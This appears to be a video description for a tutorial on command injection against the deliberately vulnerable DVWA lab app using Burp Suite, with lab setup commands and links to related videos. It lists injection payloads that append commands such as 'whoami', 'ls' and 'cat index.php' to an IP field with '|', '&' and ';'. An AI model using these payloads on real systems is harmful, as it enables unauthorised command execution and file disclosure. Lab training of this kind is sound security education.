Рет қаралды 240
Today we are going to learn on how to test and run Command Injection vulnerabilities on DVWA on low and medium level using Burpsuite.
Sources and Links:
All commands:
1. Starting sql server: systemctl start mysql
2. Status check: systemctl status mysql
3. Starting apache2 server: systemctl start apache2
Low level commands:
127.0.0.1
127.0.0.1|whoami
127.0.0.1|whoami;ls
127.0.0.1|whoami;ls ; cat index.php
Medium level commands:
127.0.0.1
127.0.0.1|whoami
127.0.0.1&ls
127.0.0.1&cat index.php
Burpsuite commands:
|whoami
|whoami;ls
&ls
;ls
;ls; cat stock report.sh
Kali Linux lab Setup Video:
• How to Setup Kali Linu...
Burpsuite setup Video:
• Testing IDOR Vulnerabl...
DVWA setup Video:
• Testing IDOR Vulnerabl...
#vtu #cybersecurity #ethicalhacking #DVAA #commandinjection #bupsuite